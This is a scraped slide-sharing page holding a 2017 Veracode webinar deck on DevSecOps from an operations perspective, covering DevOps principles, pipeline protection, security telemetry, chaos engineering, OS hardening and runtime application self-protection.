DevOps for Enterprise Systems : Innovate like a Startup
 
intro to DevOps
intro to DevOpsintro to DevOps
intro to DevOps
 
Deliver on the Promise of Agile and DevOps Transformations
Deliver on the Promise of Agile and DevOps TransformationsDeliver on the Promise of Agile and DevOps Transformations
Deliver on the Promise of Agile and DevOps Transformations
 
Back To Basics
Back To BasicsBack To Basics
Back To Basics
 

Recently uploaded

How To Troubleshoot Collaboration Apps for the Modern Connected Worker
How To Troubleshoot Collaboration Apps for the Modern Connected WorkerHow To Troubleshoot Collaboration Apps for the Modern Connected Worker
How To Troubleshoot Collaboration Apps for the Modern Connected WorkerThousandEyes
 
How To Use Server-Side Rendering with Nuxt.js
How To Use Server-Side Rendering with Nuxt.jsHow To Use Server-Side Rendering with Nuxt.js
How To Use Server-Side Rendering with Nuxt.jsAndolasoft Inc
 
W01_panagenda_Navigating-the-Future-with-The-Hitchhikers-Guide-to-Notes-and-D...
W01_panagenda_Navigating-the-Future-with-The-Hitchhikers-Guide-to-Notes-and-D...W01_panagenda_Navigating-the-Future-with-The-Hitchhikers-Guide-to-Notes-and-D...
W01_panagenda_Navigating-the-Future-with-The-Hitchhikers-Guide-to-Notes-and-D...panagenda
 
Tech Tuesday-Harness the Power of Effective Resource Planning with OnePlan’s ...
Tech Tuesday-Harness the Power of Effective Resource Planning with OnePlan’s ...Tech Tuesday-Harness the Power of Effective Resource Planning with OnePlan’s ...
Tech Tuesday-Harness the Power of Effective Resource Planning with OnePlan’s ...OnePlan Solutions
 
HR Software Buyers Guide in 2024 - HRSoftware.com
HR Software Buyers Guide in 2024 - HRSoftware.comHR Software Buyers Guide in 2024 - HRSoftware.com
HR Software Buyers Guide in 2024 - HRSoftware.comFatema Valibhai
 
Unveiling the Tech Salsa of LAMs with Janus in Real-Time Applications
Unveiling the Tech Salsa of LAMs with Janus in Real-Time ApplicationsUnveiling the Tech Salsa of LAMs with Janus in Real-Time Applications
Unveiling the Tech Salsa of LAMs with Janus in Real-Time ApplicationsAlberto González Trastoy
 
How to Choose the Right Laravel Development Partner in New York City_compress...
How to Choose the Right Laravel Development Partner in New York City_compress...How to Choose the Right Laravel Development Partner in New York City_compress...
How to Choose the Right Laravel Development Partner in New York City_compress...software pro Development
 
Exploring the Best Video Editing App.pdf
Exploring the Best Video Editing App.pdfExploring the Best Video Editing App.pdf
Exploring the Best Video Editing App.pdfproinshot.com
 
Azure_Native_Qumulo_High_Performance_Compute_Benchmarks.pdf
Azure_Native_Qumulo_High_Performance_Compute_Benchmarks.pdfAzure_Native_Qumulo_High_Performance_Compute_Benchmarks.pdf
Azure_Native_Qumulo_High_Performance_Compute_Benchmarks.pdfryanfarris8
 
Direct Style Effect Systems - The Print[A] Example - A Comprehension Aid
Direct Style Effect Systems - The Print[A] Example - A Comprehension AidDirect Style Effect Systems - The Print[A] Example - A Comprehension Aid
Direct Style Effect Systems - The Print[A] Example - A Comprehension AidPhilip Schwarz
 
Shapes for Sharing between Graph Data Spaces - and Epistemic Querying of RDF-...
Shapes for Sharing between Graph Data Spaces - and Epistemic Querying of RDF-...Shapes for Sharing between Graph Data Spaces - and Epistemic Querying of RDF-...
Shapes for Sharing between Graph Data Spaces - and Epistemic Querying of RDF-...Steffen Staab
 
A Secure and Reliable Document Management System is Essential.docx
A Secure and Reliable Document Management System is Essential.docxA Secure and Reliable Document Management System is Essential.docx
A Secure and Reliable Document Management System is Essential.docxComplianceQuest1
 
AI & Machine Learning Presentation Template
AI & Machine Learning Presentation TemplateAI & Machine Learning Presentation Template
AI & Machine Learning Presentation TemplatePresentation.STUDIO
 
Learn the Fundamentals of XCUITest Framework_ A Beginner's Guide.pdf
Learn the Fundamentals of XCUITest Framework_ A Beginner's Guide.pdfLearn the Fundamentals of XCUITest Framework_ A Beginner's Guide.pdf
Learn the Fundamentals of XCUITest Framework_ A Beginner's Guide.pdfkalichargn70th171
 
The Real-World Challenges of Medical Device Cybersecurity- Mitigating Vulnera...
The Real-World Challenges of Medical Device Cybersecurity- Mitigating Vulnera...The Real-World Challenges of Medical Device Cybersecurity- Mitigating Vulnera...
The Real-World Challenges of Medical Device Cybersecurity- Mitigating Vulnera...ICS
 
introduction-to-automotive Andoid os-csimmonds-ndctechtown-2021.pdf
introduction-to-automotive Andoid os-csimmonds-ndctechtown-2021.pdfintroduction-to-automotive Andoid os-csimmonds-ndctechtown-2021.pdf
introduction-to-automotive Andoid os-csimmonds-ndctechtown-2021.pdfVishalKumarJha10
 
8257 interfacing 2 in microprocessor for btech students
8257 interfacing 2 in microprocessor for btech students8257 interfacing 2 in microprocessor for btech students
8257 interfacing 2 in microprocessor for btech studentsHimanshiGarg82
 
The Ultimate Test Automation Guide_ Best Practices and Tips.pdf
The Ultimate Test Automation Guide_ Best Practices and Tips.pdfThe Ultimate Test Automation Guide_ Best Practices and Tips.pdf
The Ultimate Test Automation Guide_ Best Practices and Tips.pdfkalichargn70th171
 
10 Trends Likely to Shape Enterprise Technology in 2024
10 Trends Likely to Shape Enterprise Technology in 202410 Trends Likely to Shape Enterprise Technology in 2024
10 Trends Likely to Shape Enterprise Technology in 2024Mind IT Systems
 
Introducing Microsoft’s new Enterprise Work Management (EWM) Solution
Introducing Microsoft’s new Enterprise Work Management (EWM) SolutionIntroducing Microsoft’s new Enterprise Work Management (EWM) Solution
Introducing Microsoft’s new Enterprise Work Management (EWM) SolutionOnePlan Solutions
 

Recently uploaded (20)

How To Troubleshoot Collaboration Apps for the Modern Connected Worker
How To Troubleshoot Collaboration Apps for the Modern Connected WorkerHow To Troubleshoot Collaboration Apps for the Modern Connected Worker
How To Troubleshoot Collaboration Apps for the Modern Connected Worker
 
How To Use Server-Side Rendering with Nuxt.js
How To Use Server-Side Rendering with Nuxt.jsHow To Use Server-Side Rendering with Nuxt.js
How To Use Server-Side Rendering with Nuxt.js
 
W01_panagenda_Navigating-the-Future-with-The-Hitchhikers-Guide-to-Notes-and-D...
W01_panagenda_Navigating-the-Future-with-The-Hitchhikers-Guide-to-Notes-and-D...W01_panagenda_Navigating-the-Future-with-The-Hitchhikers-Guide-to-Notes-and-D...
W01_panagenda_Navigating-the-Future-with-The-Hitchhikers-Guide-to-Notes-and-D...
 
Tech Tuesday-Harness the Power of Effective Resource Planning with OnePlan’s ...
Tech Tuesday-Harness the Power of Effective Resource Planning with OnePlan’s ...Tech Tuesday-Harness the Power of Effective Resource Planning with OnePlan’s ...
Tech Tuesday-Harness the Power of Effective Resource Planning with OnePlan’s ...
 
HR Software Buyers Guide in 2024 - HRSoftware.com
HR Software Buyers Guide in 2024 - HRSoftware.comHR Software Buyers Guide in 2024 - HRSoftware.com
HR Software Buyers Guide in 2024 - HRSoftware.com
 
Unveiling the Tech Salsa of LAMs with Janus in Real-Time Applications
Unveiling the Tech Salsa of LAMs with Janus in Real-Time ApplicationsUnveiling the Tech Salsa of LAMs with Janus in Real-Time Applications
Unveiling the Tech Salsa of LAMs with Janus in Real-Time Applications
 
How to Choose the Right Laravel Development Partner in New York City_compress...
How to Choose the Right Laravel Development Partner in New York City_compress...How to Choose the Right Laravel Development Partner in New York City_compress...
How to Choose the Right Laravel Development Partner in New York City_compress...
 
Exploring the Best Video Editing App.pdf
Exploring the Best Video Editing App.pdfExploring the Best Video Editing App.pdf
Exploring the Best Video Editing App.pdf
 
Azure_Native_Qumulo_High_Performance_Compute_Benchmarks.pdf
Azure_Native_Qumulo_High_Performance_Compute_Benchmarks.pdfAzure_Native_Qumulo_High_Performance_Compute_Benchmarks.pdf
Azure_Native_Qumulo_High_Performance_Compute_Benchmarks.pdf
 
Direct Style Effect Systems - The Print[A] Example - A Comprehension Aid
Direct Style Effect Systems - The Print[A] Example - A Comprehension AidDirect Style Effect Systems - The Print[A] Example - A Comprehension Aid
Direct Style Effect Systems - The Print[A] Example - A Comprehension Aid
 
Shapes for Sharing between Graph Data Spaces - and Epistemic Querying of RDF-...
Shapes for Sharing between Graph Data Spaces - and Epistemic Querying of RDF-...Shapes for Sharing between Graph Data Spaces - and Epistemic Querying of RDF-...
Shapes for Sharing between Graph Data Spaces - and Epistemic Querying of RDF-...
 
A Secure and Reliable Document Management System is Essential.docx
A Secure and Reliable Document Management System is Essential.docxA Secure and Reliable Document Management System is Essential.docx
A Secure and Reliable Document Management System is Essential.docx
 
AI & Machine Learning Presentation Template
AI & Machine Learning Presentation TemplateAI & Machine Learning Presentation Template
AI & Machine Learning Presentation Template
 
Learn the Fundamentals of XCUITest Framework_ A Beginner's Guide.pdf
Learn the Fundamentals of XCUITest Framework_ A Beginner's Guide.pdfLearn the Fundamentals of XCUITest Framework_ A Beginner's Guide.pdf
Learn the Fundamentals of XCUITest Framework_ A Beginner's Guide.pdf
 
The Real-World Challenges of Medical Device Cybersecurity- Mitigating Vulnera...
The Real-World Challenges of Medical Device Cybersecurity- Mitigating Vulnera...The Real-World Challenges of Medical Device Cybersecurity- Mitigating Vulnera...
The Real-World Challenges of Medical Device Cybersecurity- Mitigating Vulnera...
 
introduction-to-automotive Andoid os-csimmonds-ndctechtown-2021.pdf
introduction-to-automotive Andoid os-csimmonds-ndctechtown-2021.pdfintroduction-to-automotive Andoid os-csimmonds-ndctechtown-2021.pdf
introduction-to-automotive Andoid os-csimmonds-ndctechtown-2021.pdf
 
8257 interfacing 2 in microprocessor for btech students
8257 interfacing 2 in microprocessor for btech students8257 interfacing 2 in microprocessor for btech students
8257 interfacing 2 in microprocessor for btech students
 
The Ultimate Test Automation Guide_ Best Practices and Tips.pdf
The Ultimate Test Automation Guide_ Best Practices and Tips.pdfThe Ultimate Test Automation Guide_ Best Practices and Tips.pdf
The Ultimate Test Automation Guide_ Best Practices and Tips.pdf
 
10 Trends Likely to Shape Enterprise Technology in 2024
10 Trends Likely to Shape Enterprise Technology in 202410 Trends Likely to Shape Enterprise Technology in 2024
10 Trends Likely to Shape Enterprise Technology in 2024
 
Introducing Microsoft’s new Enterprise Work Management (EWM) Solution
Introducing Microsoft’s new Enterprise Work Management (EWM) SolutionIntroducing Microsoft’s new Enterprise Work Management (EWM) Solution
Introducing Microsoft’s new Enterprise Work Management (EWM) Solution
 

How to get the best out of DevSecOps - an operations perspective

  • 1. © 2017 VERACODE INC. 1© 2017 VERACODE INC. How to Get the Best Out Of DevSecOps The Operations Perspective
  • 2. © 2017 VERACODE INC. 2© 2017 VERACODE INC. Introduction
  • 3. © 2017 VERACODE INC. 3 About This Webinar https://www.brighttalk.com/webcast/12807/252395 Colin Domoney Senior Product Innovation Manager @colindomoney
  • 4. © 2017 VERACODE INC. 4 Further Reading Kim, Gene, Kevin Behr, and George Spafford. 2013. The Phoenix Project: A Novel About IT, DevOps, and Helping Your Business Win. Kim, Gene, Patrick Debois, and John Willis. 2016. The Devops Handbook: How to Create World-Class Agility, Reliability, and Security in Technology Organizations Beyer, Betsy, Jennifer Petoff, Chris Jones, and Niall Richard Murphy. Site Reliability Engineering: How Google Runs Production Systems. 1 edition. O′Reilly, 2016. Humble, Jez, and David Farley. 2010. Continuous Delivery: Reliable Software Releases Through Build, Test, and Deployment Automation. ‘2016 State of DevOps Report’. 2017. Puppet. Accessed January 23. https://puppet.com/resources/white- paper/2016-state-of-devops-report.
  • 5. © 2017 VERACODE INC. 6© 2017 VERACODE INC. What is Dev(Sec)Ops
  • 6. © 2017 VERACODE INC. 7 A Cultural Clash
  • 7. © 2017 VERACODE INC. 8 What is Dev(Sec) Ops? “DevOps is the practice of operations and development engineers participating together in the entire service lifecycle, from design through the development process to production support.” “DevOps is also characterized by operations staff making use many of the same techniques as developers for their systems work.” Source : ‘What Is DevOps?’ 2010. The Agile Admin. August 2. https://theagileadmin.com/what-is-devops/.
  • 8. © 2017 VERACODE INC. 9 The First Way : Systems Thinking Source : Kim, Gene. 2012. ‘The Three Ways: The Principles Underpinning DevOps’. IT Revolution. August 22. http://itrevolution.com/the-three-ways- principles-underpinning-devops/. • Never pass a known defect to downstream work centre • Never allow local optimization to create global degradation • Always seek to increase flow • Always seek to achieve profound understanding of the system (per Deming) The First Way emphasizes the performance of the entire system, as opposed to the performance of a specific silo of work or department
  • 9. © 2017 VERACODE INC. 10 The Second Way : Amplify Feedback Loops Source : Kim, Gene. 2012. ‘The Three Ways: The Principles Underpinning DevOps’. IT Revolution. August 22. http://itrevolution.com/the-three-ways- principles-underpinning-devops/. The Second Way is about creating the right to left feedback loops. • Understand and respond to all customers, internal and external • Shorten and amplify all feedback loops • Embed knowledge where you need it
  • 10. © 2017 VERACODE INC. 11 The Third Way : Continual Experimentation and Learning Source : Kim, Gene. 2012. ‘The Three Ways: The Principles Underpinning DevOps’. IT Revolution. August 22. http://itrevolution.com/the-three-ways- principles-underpinning-devops/. • Allocate time for the improvement of daily work • Create rituals that reward the team for taking risks • Introduce faults into the system to increase resilience The Third Way is about creating a culture that fosters two things: continual experimentation, taking risks and learning from failure; and understanding that repetition and practice is the prerequisite to mastery.
  • 11. © 2017 VERACODE INC. 12 The Benefits of DevOps • High-performing organizations are decisively outperforming their lower-performing peers in terms of throughput. • High performers have better employee loyalty, as measured by employee Net Promoter Score (eNPS). • Improving quality is everyone’s job. • High performers spend 50 percent less time remediating security issues than low performers. • Taking an experimental approach to product development can improve your IT and organizational performance. • Undertaking a technology transformation initiative can produce sizeable cost savings for any organization. Source : ‘2016 State of DevOps Report’. 2017. Puppet. Accessed January 23. https://puppet.com/resources/white-paper/2016-state-of-devops-report.
  • 12. © 2017 VERACODE INC. 13 DevOps Maturity Model Initial • Poor, ad hoc communication • No automation • Unpredictable, uncontrolled reactive process Managed • Managed communication, some shared decision making • Siloed automation, no central infrastructure • Processes are managed but not standardised Defined • Collaboration, shared decision making and accountability • Central automated processes across the application lifecycle • Processes are standardised across the organisation Measured • Collaboration-based processes are measured to identify inefficiencies and bottlenecks • Collect and analyse metrics of the automated processes and measure against the business goals • Visibility and predictability of entire process quality and performance Optimised • Effective knowledge sharing and individual empowerment • Self-service automation, self-learning using analytics and self-remediation • Process risk and cost optimisation
  • 13. © 2017 VERACODE INC. 14© 2017 VERACODE INC. The Move to DevOps Market trends and enabling technologies
  • 14. © 2017 VERACODE INC. 15 Before We Had DevOps
  • 15. © 2017 VERACODE INC. 16 Cloud Technology and CI/CD Platforms Cloud Technology CI/CD Platforms
  • 16. © 2017 VERACODE INC. 17 Configuration Management Tools
  • 17. © 2017 VERACODE INC. 18 What Makes a Good DevSecOps Solution? •Provide security feedback as early as possible, in DevOps tools Fail quickly, through automation •Ease of use, actionable findings, speed, low FPs Limit time-to-market impact •Provide privacy early in SDLC, measure and assess teams, compliance and risk later Support team autonomy with enterprise orchestration •Microservices, Infrastructure as Code, leading edge languages and frameworks, Containerization Adapt to latest practices & technologies •Developer communities, small, consumable courses, open documentation, integrations in marketplaces Support culture of learning & openness •Provide feedback from Ops (Prod & QA) about risks/attacks in a way that is consumable by development Provide operational visibility
  • 18. © 2017 VERACODE INC. 19© 2017 VERACODE INC. The Impact to Operations
  • 19. © 2017 VERACODE INC. 20 Three Cornerstones • Collaboration – Very little crossover between teams, specific roles and responsibilities – Collaborate flexibly through flexible tools (i.e.. Slack) • Flexibility – Previously focused on stability over everything else – Modern organisations need to be flexible and responsive • Automation – Manual changes cannot keep pace with rapid turnaround times required – Frees up resources for critical thinking tasks and problem solving
  • 20. © 2017 VERACODE INC. 21 “Infrastructure as Code” https://puppet.com/blog/what-is-infrastructure-as-code
  • 21. © 2017 VERACODE INC. 22 Site Reliability Engineering - It’s all Software Now • Defined by Ben Treynor: "what happens when a software engineer is tasked with what used to be called operations. • The ideal SRE candidate is a coder who also has operational and systems knowledge and likes to whittle down complex tasks. • Typically spend their time as follows: – up to 50% of their time doing "ops" related work – up to 50% of their time on development tasks such as new features, scaling or automation https://en.wikipedia.org/wiki/Site_reliability_engineering
  • 22. © 2017 VERACODE INC. 23© 2017 VERACODE INC. Best Practices for Securing Operations
  • 23. © 2017 VERACODE INC. 24 Control Your Source Code Repositories • Continuous Deployment means any code checked in can potentially reach production within minutes • Best practices include: – Splitting repositories – Using Perforce for fine grained control – Performing peer reviews on ‘pull requests’ to critical code
  • 24. © 2017 VERACODE INC. 25 Protect Your Deployment Pipeline • Continuous Deployment means that your pipeline is a critical piece of infrastructure • Best practices include: – Hardening CI/CD systems to prevent compromise – Review changes to prevent execution of unwanted code – Test for suspicious API calls in unit tests or scripts – Ensure CI/CD runs in isolated containers – Ensure VCS credentials are ‘read only’
  • 25. © 2017 VERACODE INC. 26 Using Security Testing Tools Behavioural Driven Development Security Testing IDE Integrations for Security Testing
  • 26. © 2017 VERACODE INC. 27 Integrate Security Into Your Deployment Pipeline – VSTS/TFS
  • 27. © 2017 VERACODE INC. 28 Integrate Security Into Your Deployment Pipeline - Jenkins
  • 28. © 2017 VERACODE INC. 29 Security Telemetry in Applications • Record all security relevant events such as: – Successful and unsuccessful logins – User password resets – User e-mail address resets – User credit card changes • Monitor changes in ratios of success to failures • Alert on events such as: – Anomalous behaviour – Sudden changes in values
  • 29. © 2017 VERACODE INC. 30 Security Telemetry in the Environment • Monitor environmental items and events such as: – OS changes – Security group changes – Changes to configurations – Cloud infrastructure changes – Web server errors
  • 30. © 2017 VERACODE INC. 31 Use the Right Tool for Job https://www.slideshare.net/YuryChemerkin/zane-lackey-security-at-scale-web-application-security-in-a- continuous-deployment-environment
  • 31. © 2017 VERACODE INC. 32 Use the Right Tool for Job https://www.slideshare.net/YuryChemerkin/zane-lackey-security-at-scale-web-application-security-in-a- continuous-deployment-environment
  • 32. © 2017 VERACODE INC. 33 Case Study : Security Telemetry at Etsy • Nick Galbreath (Director of Engineering at Etsy, 2010): – No dedicated fraud control or Infosec team – Embedded telemetry with entire DevOps value stream – Everyone was responsible for monitoring and alerting • Example events: – Abnormal program termination (segfaults) – Database syntax error – Indications of SQL attack
  • 33. © 2017 VERACODE INC. 34 Automated Dashboards – “Measure All The Things”
  • 34. © 2017 VERACODE INC. 35 “Security Is Not A Binary Event” https://www.slideshare.net/nickgsuperstar/devopssec-apply-devops- principles-to-security
  • 35. © 2017 VERACODE INC. 36 Logging for Security • Logs are the ‘bread and butter’ of an IT Operations team • Challenges when used in a security context: – Delayed response to identity issues (delays in alerting) – Limited data (no POST body, no header data) – Limited context (disparate events in several locations) Phillip Maddux, https://medium.com/@foospidy
  • 36. © 2017 VERACODE INC. 37 Destructive Testing / Chaos Engineering Chaos Engineering is the discipline of experimenting on a distributed system in order to build confidence in the system’s capability to withstand turbulent conditions in production. Four steps as follows: • Build a hypothesis around steady-state behaviour. • Vary real-world events. • Run experiments in production. • Automate experiments to run continuously. “The best way to avoid failure is to fail constantly.” - Jeff Atwood
  • 37. © 2017 VERACODE INC. 38 Case Study : Netflix
  • 38. © 2017 VERACODE INC. 40 Operating System Hardening • Disable unused and/or guest accounts • Run at level of least privilege • Disable unused services • Ensure automatic updates are enabled • Ensure strong passwords are used • Disable overly verbose logging • Ensure backups are performed
  • 39. © 2017 VERACODE INC. 41 Runtime Application Self Protection • Very low false positives and false negatives. • Requires no modification to application source code. • Can report attack information into SIEM. • Can be deployed onto legacy applications and platforms. • Can execute in ‘monitor’ or ‘alert’ mode to identify attacks without protecting the application (IAST) Benefits of RASP • An ‘agent’ that executes in parallel with an application and provides run-time protection by monitoring traffic through the application. • Data propagation through the application to determine whether input data is ‘tainted’ in its lifetime. • If data is tainted then it is possible that the application is under attack and the agent can then protect the application at run-time. What is RASP?
  • 40. © 2017 VERACODE INC. 42 Change Management Process • ITIL change management process defines three types of change: – Standard (low-risk, follow standard process, can be automated) – Normal (require approval by CAB, manual process) – Emergency (high priority CAB) • Too many changes are classified as ‘normal’ • DevOps best practice suggests: – Try and make as much as possible ‘standard’ and auto-approve – Optimise the CAB process for requests that remain as ‘normal’
  • 41. © 2017 VERACODE INC. 43 Make a Commitment • Learn how to code! • Learn the ‘tools of the trade’ (Git, Ansible, etc.) • Learn the basics with a test application i.e. WebGoat.Net • Learn how a Version Control System works • Automate a repetitive task • Experience a ‘Day in the Life’ of a Developer Security is Everyone’s Responsibility
  • 42. © 2017 VERACODE INC. 45 Thank You! © 2017 VERACODE INC.